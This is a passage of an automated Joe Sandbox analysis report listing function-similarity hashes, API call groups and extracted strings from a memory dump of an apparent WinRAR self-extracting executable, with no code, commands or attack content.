                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c2f19e6b73aee1f2f5e000d2da9400488e5c9e4bdb3b1ca053d999cefcb7b96b
                                                        • Instruction ID: 193d7ef76fad49858e95eaa769afa74637448216d3fc8f5534f79389bece3760
                                                        • Opcode Fuzzy Hash: c2f19e6b73aee1f2f5e000d2da9400488e5c9e4bdb3b1ca053d999cefcb7b96b
                                                        • Instruction Fuzzy Hash: 6FD1AC72A191E08EE312CB7AA0544BEBFB5E31D34DB898261DFD55364AC52EE102DB60
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1a52658466727774bbc5190e23dd1b7b6af61c425033d8b5861d1633cf72f70c
                                                        • Instruction ID: 4735a114c324935855ff9b30b375452c5524f60033875dcd55b4bfd7d509f192
                                                        • Opcode Fuzzy Hash: 1a52658466727774bbc5190e23dd1b7b6af61c425033d8b5861d1633cf72f70c
                                                        • Instruction Fuzzy Hash: CE615B23B195E19AEB11DF76C5404FDBFB5E719784B854032CFA95368ACA3CE205CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a32c869db70b81adf3522ed7f59e1138653d4678039c6ce20c10f5af40288726
                                                        • Instruction ID: ac596ea15280381d35e8d503148dc0a69114257906651e05e0f7e549b164186d
                                                        • Opcode Fuzzy Hash: a32c869db70b81adf3522ed7f59e1138653d4678039c6ce20c10f5af40288726
                                                        • Instruction Fuzzy Hash: 4BF068717292658BDBA49F29F89262977D0F708380F80807AD79D83B44D73DD0618F54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f94cb7f15edc88b1d12639b83f3e26873c5ba86b2582cc478741a5978fcbbfad
                                                        • Instruction ID: dfdb69341c79bfd9dd0375c38dff95f37cf7507b1f12b19232b0cd9cf18dff06
                                                        • Opcode Fuzzy Hash: f94cb7f15edc88b1d12639b83f3e26873c5ba86b2582cc478741a5978fcbbfad
                                                        • Instruction Fuzzy Hash: CFA0012590A906D2EB44AF02E8A0030B720BB90714B810131D26D811E1DE2CB880C2A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                        • API String ID: 2565136772-3242537097
                                                        • Opcode ID: 0b79975b7dd6f8f0ba486823e03a824d6b613ffbf8d8ef1d3073c77c991e81f6
                                                        • Instruction ID: 58c94c5692ea409d5dec6677fd2e3b9d6bcd67c7fb59cfb2e00ddf978c432025
                                                        • Opcode Fuzzy Hash: 0b79975b7dd6f8f0ba486823e03a824d6b613ffbf8d8ef1d3073c77c991e81f6
                                                        • Instruction Fuzzy Hash: 5921B920A0AA0B93EF15BF52E8D4675B2A0BF44B50FC40035DB2E427E5EE2CE55583E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                        • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                        • API String ID: 431506467-1315819833
                                                        • Opcode ID: 298c586111d514159f6b3e130679215706b4aae0a9f6553a775b1ee798cc2d48
                                                        • Instruction ID: bd45be35c7c416e2d9bd72e048ac1e1bf2dec550e803bcfb4eac0dd0db8c78b3
                                                        • Opcode Fuzzy Hash: 298c586111d514159f6b3e130679215706b4aae0a9f6553a775b1ee798cc2d48
                                                        • Instruction Fuzzy Hash: C8B1A262F1974296FB00AF66D4C52BCB362BB45798F804235DF6C26AD9DE3CE445C390
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                        • API String ID: 3215553584-2617248754
                                                        • Opcode ID: ecb774820e808d1f0f9a4e937ddb804214af7c9ed034d139096f4d2aec068b6e
                                                        • Instruction ID: 3711a039317e0f695eb3fa21373d4e509675da848b58f4db76373e1184c43a1b
                                                        • Opcode Fuzzy Hash: ecb774820e808d1f0f9a4e937ddb804214af7c9ed034d139096f4d2aec068b6e
                                                        • Instruction Fuzzy Hash: 1A417D32A05B458AFB04DF26E8817AD73A4EB14798F844239DF6C47B94EE3CD025C394
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                        • String ID: STATIC
                                                        • API String ID: 781704138-1882779555
                                                        • Opcode ID: bc0be446892835b112d3ea8da969d9d501e29b07b714163f2e7357c3afb8a8db
                                                        • Instruction ID: af540e93b9a94629f5ee649693f8673222e266ee5e1d651d0a43bdc2527ac37c
                                                        • Opcode Fuzzy Hash: bc0be446892835b112d3ea8da969d9d501e29b07b714163f2e7357c3afb8a8db
                                                        • Instruction Fuzzy Hash: 22317025A1864247EB20AF13E8947B9F391BB89BC0F840031DF6D47BD6DE3CE40686A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                        • String ID: UNC$\\?\
                                                        • API String ID: 4097890229-253988292
                                                        • Opcode ID: 43643b174e56843467f28f8f267d802de6be347339de23e5bba293cc8b85cc71
                                                        • Instruction ID: 78f3d7cd9cea680a5daed3ac38ba585ced463780bd68e03963c9ddf96107dc60
                                                        • Opcode Fuzzy Hash: 43643b174e56843467f28f8f267d802de6be347339de23e5bba293cc8b85cc71
                                                        • Instruction Fuzzy Hash: 4812D122B0AA46D6EB10EF66D4941ADB371FB41B88F904131EB6D07AE9DF3CE545C390
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                        • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                        • API String ID: 2721297748-1533471033
                                                        • Opcode ID: cfef3d20ae1ea1e771d0f4b428877c633816d15235bb3192cbe0bbbd29cc77e1
                                                        • Instruction ID: 315273a7a9dd0b7dcf14cb78adff81721a86e1ca13cca70ae5c77572d578bbd5
                                                        • Opcode Fuzzy Hash: cfef3d20ae1ea1e771d0f4b428877c633816d15235bb3192cbe0bbbd29cc77e1
                                                        • Instruction Fuzzy Hash: D181AF62B19A4696FB04EFA6D4902EDB371BB44B84F804535CF2D177DAEE38D506C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Item$Text
                                                        • String ID: LICENSEDLG
                                                        • API String ID: 1601838975-2177901306
                                                        • Opcode ID: b6b3d31fd237dc538bae67d25694d29fd7603d5cdce674f81891652934a12be7
                                                        • Instruction ID: bbb666a7da5b4f454d7649767b48a808fc2adf441f9f915a81cb07f641eb35d2
                                                        • Opcode Fuzzy Hash: b6b3d31fd237dc538bae67d25694d29fd7603d5cdce674f81891652934a12be7
                                                        • Instruction Fuzzy Hash: E941A021A1865283FB64AF13E8847B8B7A1FB85B90F840135DB2E03BD5DF3CA54583A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                        • API String ID: 2915667086-2207617598
                                                        • Opcode ID: 650d80ab3b9444374d6aba1c01b0a764a9533b8d21915374c342d0535c25459a
                                                        • Instruction ID: 997ca529c5e6b2a4487609d8058f314b5c1c67c0c3c3f4fa2f87cd1010c65b83
                                                        • Opcode Fuzzy Hash: 650d80ab3b9444374d6aba1c01b0a764a9533b8d21915374c342d0535c25459a
                                                        • Instruction Fuzzy Hash: BA313824A0AA96A3EB04AF17E8D0174F7A0BF45B94B854135CB7E477E9DF3CE44187A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID: $
                                                        • API String ID: 3668304517-227171996
                                                        • Opcode ID: 81ccb3cb22b2da4d31f11f4697d00a3e73a363ac1590a73fca997ac7dc05c7b6
                                                        • Instruction ID: ce4df45bbf1bc5b94d771da1f33679a1247ee5db86f3b70d90c8e67b71d5092b
                                                        • Opcode Fuzzy Hash: 81ccb3cb22b2da4d31f11f4697d00a3e73a363ac1590a73fca997ac7dc05c7b6
                                                        • Instruction Fuzzy Hash: 74F19E62F24A4686EB10AF66D4C81BCB361BB45FD8F905631CB6D136D9DF7CE18083A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 2940173790-393685449
                                                        • Opcode ID: fc96c41de242e073b5df66b8ea50f0a6a3e6c880f4afa60ca767e4a75ab88775
                                                        • Instruction ID: 3ea25efa51b1dc97265eebbab448369fa12923328a7d2b4c21c637cc8ff3d5cd
                                                        • Opcode Fuzzy Hash: fc96c41de242e073b5df66b8ea50f0a6a3e6c880f4afa60ca767e4a75ab88775
                                                        • Instruction Fuzzy Hash: 28E18E72A087828BE711AF26D4C02BDB7A0FB44B48F940135EBAD576D6DF38E481C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00007FF7F4D70A5C: CompareStringW.KERNEL32(?,?,00007FF7F4D66C19), ref: 00007FF7F4D70A7B
                                                          • Part of subcall function 00007FF7F4D612BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F4D613B6
                                                          • Part of subcall function 00007FF7F4D70A8C: CompareStringW.KERNEL32 ref: 00007FF7F4D70AFC
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D71D8A
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D71D90
                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F4D71DED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CompareString_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskswprintf
                                                        • String ID: .zipx$.zx$z%s%02d
                                                        • API String ID: 2859674139-515631857
                                                        • Opcode ID: f06826b8e781a727c2983ec197f4ca2108c271821059ba588ffbc3eac0866503
                                                        • Instruction ID: eb2c33167a77e07b281e51e260b302c7e8a0851622f48b7c4be668a6e50e6fbd
                                                        • Opcode Fuzzy Hash: f06826b8e781a727c2983ec197f4ca2108c271821059ba588ffbc3eac0866503
                                                        • Instruction Fuzzy Hash: 1671A222A15B429AEB10EF66D4D13EDB361FB84788F805236EB6C46BD9DF38D144C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7F4D8AA43,?,?,?,00007FF7F4D887AE,?,?,?,00007FF7F4D88769), ref: 00007FF7F4D8A8C1
                                                        • GetLastError.KERNEL32(?,?,00000000,00007FF7F4D8AA43,?,?,?,00007FF7F4D887AE,?,?,?,00007FF7F4D88769), ref: 00007FF7F4D8A8CF
                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7F4D8AA43,?,?,?,00007FF7F4D887AE,?,?,?,00007FF7F4D88769), ref: 00007FF7F4D8A8F9
                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF7F4D8AA43,?,?,?,00007FF7F4D887AE,?,?,?,00007FF7F4D88769), ref: 00007FF7F4D8A93F
                                                        • GetProcAddress.KERNEL32(?,?,00000000,00007FF7F4D8AA43,?,?,?,00007FF7F4D887AE,?,?,?,00007FF7F4D88769), ref: 00007FF7F4D8A94B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: a53087c635860471f9d53db6ac0d0f9dab27908d44bc4eb3c5a00c2008766543
                                                        • Instruction ID: c69b589f3a86ac6de5242902effc27d821b6766e9b51fd62b4515ccba8c45992
                                                        • Opcode Fuzzy Hash: a53087c635860471f9d53db6ac0d0f9dab27908d44bc4eb3c5a00c2008766543
                                                        • Instruction Fuzzy Hash: 5F315C21A1FA4692EB15BF43E880675B394BF45BA4FDA0535DE6D4A3D1DF3CE44082A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(?,?,?,00007FF7F4D84FC3,?,?,?,00007FF7F4D8537A), ref: 00007FF7F4D8507B
                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7F4D84FC3,?,?,?,00007FF7F4D8537A), ref: 00007FF7F4D85098
                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7F4D84FC3,?,?,?,00007FF7F4D8537A), ref: 00007FF7F4D850B4
                                                        Strings
                                                        Memory Dump Source
